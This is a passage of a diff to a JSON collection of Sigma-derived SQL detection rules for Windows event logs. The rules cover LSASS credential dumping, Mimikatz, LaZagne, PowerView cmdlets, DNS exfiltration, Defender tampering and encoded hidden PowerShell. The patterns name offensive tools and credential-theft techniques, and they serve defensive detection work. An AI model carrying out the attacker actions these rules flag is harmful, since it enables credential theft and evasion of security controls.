'%\\\\DropboxUpdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebexMTA.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\JetBrains\\\\Toolbox\\\\bin\\\\jetbrains-toolbox.exe' ESCAPE '\\') AND GrantedAccess = '0x410') OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent-sc\\\\%' ESCAPE '\\') AND (SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1fffff', '0x1010', '0x101010')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vs\\_bootstrapper\\_%' ESCAPE '\\' AND GrantedAccess = '0x1410') OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\GoogleUpdate.exe' ESCAPE '\\' AND GrantedAccess = '0x410') OR ((SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\keybase.exe' ESCAPE '\\' AND GrantedAccess = '0x1fffff') OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\avira\\_system\\_speedup.tmp' ESCAPE '\\' AND GrantedAccess = '0x1410')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-Process lsass%' ESCAPE '\\')" ], - "filename": "proc_access_win_susp_proc_access_lsass_susp_source.yml" + "filename": "posh_ps_susp_getprocess_lsass.yml" }, { - "title": "Mimikatz through Windows Remote Management", - "id": "aa35a627-33fb-4d04-a165-d33b4afca3e8", - "status": "stable", - "description": "Detects usage of mimikatz through WinRM protocol by monitoring access to lsass process by wsmprovhost.exe.", - "author": "Patryk Prauze - ING Tech", + "title": "Malicious PowerShell Keywords", + "id": "f62176f3-8128-4faa-bf6c-83261322e5eb", + "status": "test", + "description": "Detects keywords from well-known PowerShell exploitation frameworks", + "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", "attack.execution", - "attack.t1003.001", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006", - "attack.s0002" + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\wsmprovhost.exe' ESCAPE '\\') AND NOT (GrantedAccess = '0x80000000'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR ScriptBlockText LIKE '%IMAGE\\_NT\\_OPTIONAL\\_HDR64\\_MAGIC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft.Win32.UnsafeNativeMethods%' ESCAPE '\\' OR ScriptBlockText LIKE '%ReadProcessMemory.Invoke%' ESCAPE '\\' OR ScriptBlockText LIKE '%SE\\_PRIVILEGE\\_ENABLED%' ESCAPE '\\' OR ScriptBlockText LIKE '%LSA\\_UNICODE\\_STRING%' ESCAPE '\\' OR ScriptBlockText LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%PAGE\\_EXECUTE\\_READ%' ESCAPE '\\' OR ScriptBlockText LIKE '%SECURITY\\_DELEGATION%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ADJUST\\_PRIVILEGES%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ALL\\_ACCESS%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ASSIGN\\_PRIMARY%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_DUPLICATE%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ELEVATION%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_IMPERSONATE%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_INFORMATION\\_CLASS%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_PRIVILEGES%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_QUERY%' ESCAPE '\\' OR ScriptBlockText LIKE '%Metasploit%' ESCAPE '\\' OR ScriptBlockText LIKE '%Mimikatz%' ESCAPE '\\'))" ], - "filename": "proc_access_win_mimikatz_trough_winrm.yml" + "filename": "posh_ps_malicious_keywords.yml" }, { - "title": "Suspicious GrantedAccess Flags on LSASS Access", - "id": "a18dd26b-6450-46de-8c91-9659150cf088", - "status": "experimental", - "description": "Detects process access to LSASS memory with suspicious access flags", + "title": "Suspicious Export-PfxCertificate", + "id": "aa7a3fce-bef5-4311-9cc1-5f04bb8c308c", + "status": "test", + "description": "Detects Commandlet that is used to export certificates from the local certificate store and sometimes used by threat actors to steal private keys from compromised machines", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.t1552.004" ], "falsepositives": [ - "Legitimate software such as AV and EDR" + "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\')) AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Malwarebytes\\\\Anti-Malware\\\\MBAMService.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Users\\\\%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\System32\\\\perfmon.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\MRT.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Cisco\\\\Cisco AnyConnect Secure Mobility Client\\\\vpnagent.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Cisco\\\\Cisco AnyConnect Secure Mobility Client\\\\vpnagent.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (CallTrace LIKE '%|C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\{%' ESCAPE '\\' AND CallTrace LIKE '%}\\\\mpengine.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MsMpEng.exe' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND SourceImage LIKE '%Antivirus%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\MRT.exe' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Common Files\\\\McAfee\\\\MMSSHost\\\\MMSSHOST.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\') AND GrantedAccess = '0x1fffff')))" - ], - "filename": "proc_access_win_susp_proc_access_lsass.yml" - }, - { - "title": "Credential Dumping by LaZagne", - "id": "4b9a8556-99c4-470b-a40c-9c8d02c77ed0", - "status": "stable", - "description": "Detects LSASS process access by LaZagne for credential dumping.", - "author": "Bhabesh Raj, Jonhnathan Ribeiro", - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0349" - ], - "falsepositives": [ - "Unknown" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+%' ESCAPE '\\' AND CallTrace LIKE '%\\_ctypes.pyd+%' ESCAPE '\\' AND CallTrace LIKE '%python27.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ScriptBlockText LIKE '%Export-PfxCertificate%' ESCAPE '\\' AND NOT ((ScriptBlockText LIKE '%CmdletsToExport = @(%' ESCAPE '\\')))" ], - "filename": "proc_access_win_lazagne_cred_dump_lsass_access.yml" + "filename": "posh_ps_susp_export_pfxcertificate.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher - Powershell", - "id": "779c8c12-0eb1-11eb-adc1-0242ac120002", + "title": "Abuse of Service Permissions to Hide Services Via Set-Service - PS", + "id": "953945c5-22fe-4a92-9f8a-a9edc1e522da", "status": "experimental", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$?\\{?input\\}?|noexit).+\"')" - ], - "filename": "posh_ps_invoke_obfuscation_stdin.yml" - }, - { - "title": "PowerShell ShellCode", - "id": "16b37b70-6fcf-4814-a092-c36bd3aafcbd", - "status": "test", - "description": "Detects Base64 encoded Shellcode", - "author": "David Ledbetter (shellcode), Florian Roth (Nextron Systems)", + "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.persistence", "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1055", - "attack.execution", - "attack.t1059.001" + "attack.t1574.011" ], "falsepositives": [ - "Unknown" + "Rare intended use of hidden services", + "Rare FP could occur due to the non linearity of the ScriptBlockText log" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%AAAAYInlM%' ESCAPE '\\' AND (ScriptBlockText LIKE '%OiCAAAAYInlM%' ESCAPE '\\' OR ScriptBlockText LIKE '%OiJAAAAYInlM%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Set-Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%DCLCWPDTSD%' ESCAPE '\\' AND (ScriptBlockText LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR ScriptBlockText LIKE '%-sd %' ESCAPE '\\'))" ], - "filename": "posh_ps_shellcode_b64.yml" + "filename": "posh_ps_using_set_service_to_hide_services.yml" }, { "title": "PSAsyncShell - Asynchronous TCP Reverse Shell", @@ -4019,52 +3939,32 @@ "filename": "posh_ps_psasyncshell.yml" }, { - "title": "Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging", - "id": "ae2bdd58-0681-48ac-be7f-58ab4e593458", + "title": "PowerShell ADRecon Execution", + "id": "bf72941a-cba0-41ea-b18c-9aca3925690d", "status": "experimental", - "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "falsepositives": [ - "Legitimate PowerShell scripts" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-MpPreference%' ESCAPE '\\' AND (ScriptBlockText LIKE '%-ControlledFolderAccessProtectedFolders %' ESCAPE '\\' OR ScriptBlockText LIKE '%-AttackSurfaceReductionRules\\_Ids %' ESCAPE '\\' OR ScriptBlockText LIKE '%-AttackSurfaceReductionRules\\_Actions %' ESCAPE '\\' OR ScriptBlockText LIKE '%-CheckForSignaturesBeforeRunningScan %' ESCAPE '\\'))" - ], - "filename": "posh_ps_tamper_defender_remove_mppreference.yml" - }, - { - "title": "Clearing Windows Console History", - "id": "bde47d4b-9987-405c-94c7-b080410e8ea7", - "status": "test", - "description": "Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.", - "author": "Austin Songer @austinsonger", + "description": "Detects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1070.003" + "attack.discovery", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Clear-History%' ESCAPE '\\' OR ((ScriptBlockText LIKE '%Remove-Item%' ESCAPE '\\' OR ScriptBlockText LIKE '%rm%' ESCAPE '\\') AND (ScriptBlockText LIKE '%ConsoleHost\\_history.txt%' ESCAPE '\\' OR ScriptBlockText LIKE '%(Get-PSReadlineOption).HistorySavePath%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Function Get-ADRExcelComOb%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADRGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADRDomainController%' ESCAPE '\\' OR ScriptBlockText LIKE '%ADRecon-Report.xlsx%' ESCAPE '\\'))" ], - "filename": "posh_ps_clearing_windows_console_history.yml" + "filename": "posh_ps_adrecon_execution.yml" }, { - "title": "PowerShell ADRecon Execution", - "id": "bf72941a-cba0-41ea-b18c-9aca3925690d", - "status": "experimental", - "description": "Detects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7", - "author": "Bhabesh Raj", + "title": "Malicious ShellIntel PowerShell Commandlets", + "id": "402e1e1d-ad59-47b6-bf80-1ee44985b3a7", + "status": "test", + "description": "Detects Commandlet names from ShellIntel exploitation scripts.", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.discovery", "attack.execution", "attack.t1059.001" ], @@ -4073,9 +3973,9 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Function Get-ADRExcelComOb%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADRGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADRDomainController%' ESCAPE '\\' OR ScriptBlockText LIKE '%ADRecon-Report.xlsx%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Invoke-SMBAutoBrute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-GPOLinks%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Potato%' ESCAPE '\\'))" ], - "filename": "posh_ps_adrecon_execution.yml" + "filename": "posh_ps_shellintel_malicious_commandlets.yml" }, { "title": "Potential WinAPI Calls Via PowerShell Scripts", @@ -4098,1569 +3998,1501 @@ "filename": "posh_ps_accessing_win_api.yml" }, { - "title": "Powershell DNSExfiltration", - "id": "d59d7842-9a21-4bc6-ba98-64bfe0091355", + "title": "Suspicious PowerShell Invocations - Generic", + "id": "ed965133-513f-41d9-a441-e38076a0798f", "status": "test", - "description": "DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel", - "author": "frack113", + "description": "Detects suspicious PowerShell invocation command parameters", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1048" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate script" + "Very special / sneaky PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Invoke-DNSExfiltrator%' ESCAPE '\\' OR (ScriptBlockText LIKE '% -i %' ESCAPE '\\' AND ScriptBlockText LIKE '% -d %' ESCAPE '\\' AND ScriptBlockText LIKE '% -p %' ESCAPE '\\' AND ScriptBlockText LIKE '% -doh %' ESCAPE '\\' AND ScriptBlockText LIKE '% -t %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '% -enc %' ESCAPE '\\' OR ScriptBlockText LIKE '% -EncodedCommand %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ec %' ESCAPE '\\') AND (ScriptBlockText LIKE '% -w hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -window hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -windowstyle hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -w 1 %' ESCAPE '\\') AND (ScriptBlockText LIKE '% -noni %' ESCAPE '\\' OR ScriptBlockText LIKE '% -noninteractive %' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_dnsexfiltration.yml" + "filename": "posh_ps_susp_invocation_generic.yml" }, { - "title": "Malicious PowerView PowerShell Commandlets", - "id": "dcd74b95-3f36-4ed9-9598-0490951643aa", - "status": "test", - "description": "Detects Commandlet names from PowerView of PowerSploit exploitation framework.", - "author": "Bhabesh Raj", + "title": "Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging", + "id": "ae2bdd58-0681-48ac-be7f-58ab4e593458", + "status": "experimental", + "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Should not be any as administrators do not use this tool" + "Legitimate PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-DomainGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-DomainObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-ObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RemoteConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Convert-ADName%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertFrom-UACValue%' ESCAPE '\\' OR ScriptBlockText LIKE '%Convert-NameToSid%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-SID%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-PowerViewCSV%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainLocalGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainObjectPropertyOutlier%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainUserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainUserLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ForeignGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ForeignUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOComputerAdmin%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-InterestingDomain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-InterestingFile%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-LocalAdminAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ManagedSecurityGroups%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CachedRDPConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DFSshare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DNSRecord%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DNSZone%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Domain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Forest%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-IPAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LastLoggedOn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LoggedOnLocal%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetComputer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetDomain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetFileServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetForest%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetLocalGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetLoggedon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetOU%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetRDPSession%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSession%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSite%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSubnet%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PathAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Proxy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegistryMountedDrive%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegLoggedOn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SiteName%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-UserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WMIProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WMIReg%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CheckLocalAdminAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EnumerateLocalAdmin%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EventHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-FileFinder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MapDomainTrust%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ProcessHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RevertToSelf%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ShareFinder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserImpersonation%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DomainGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DomainUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-RemoteConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Request-SPNTicket%' ESCAPE '\\' OR ScriptBlockText LIKE '%Resolve-IPAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-ADObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DomainObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DomainUserPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Test-AdminAccess%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-MpPreference%' ESCAPE '\\' AND (ScriptBlockText LIKE '%-ControlledFolderAccessProtectedFolders %' ESCAPE '\\' OR ScriptBlockText LIKE '%-AttackSurfaceReductionRules\\_Ids %' ESCAPE '\\' OR ScriptBlockText LIKE '%-AttackSurfaceReductionRules\\_Actions %' ESCAPE '\\' OR ScriptBlockText LIKE '%-CheckForSignaturesBeforeRunningScan %' ESCAPE '\\'))" ], - "filename": "posh_ps_powerview_malicious_commandlets.yml" + "filename": "posh_ps_tamper_defender_remove_mppreference.yml" }, { - "title": "Dnscat Execution", - "id": "a6d67db4-6220-436d-8afc-f3842fe05d43", + "title": 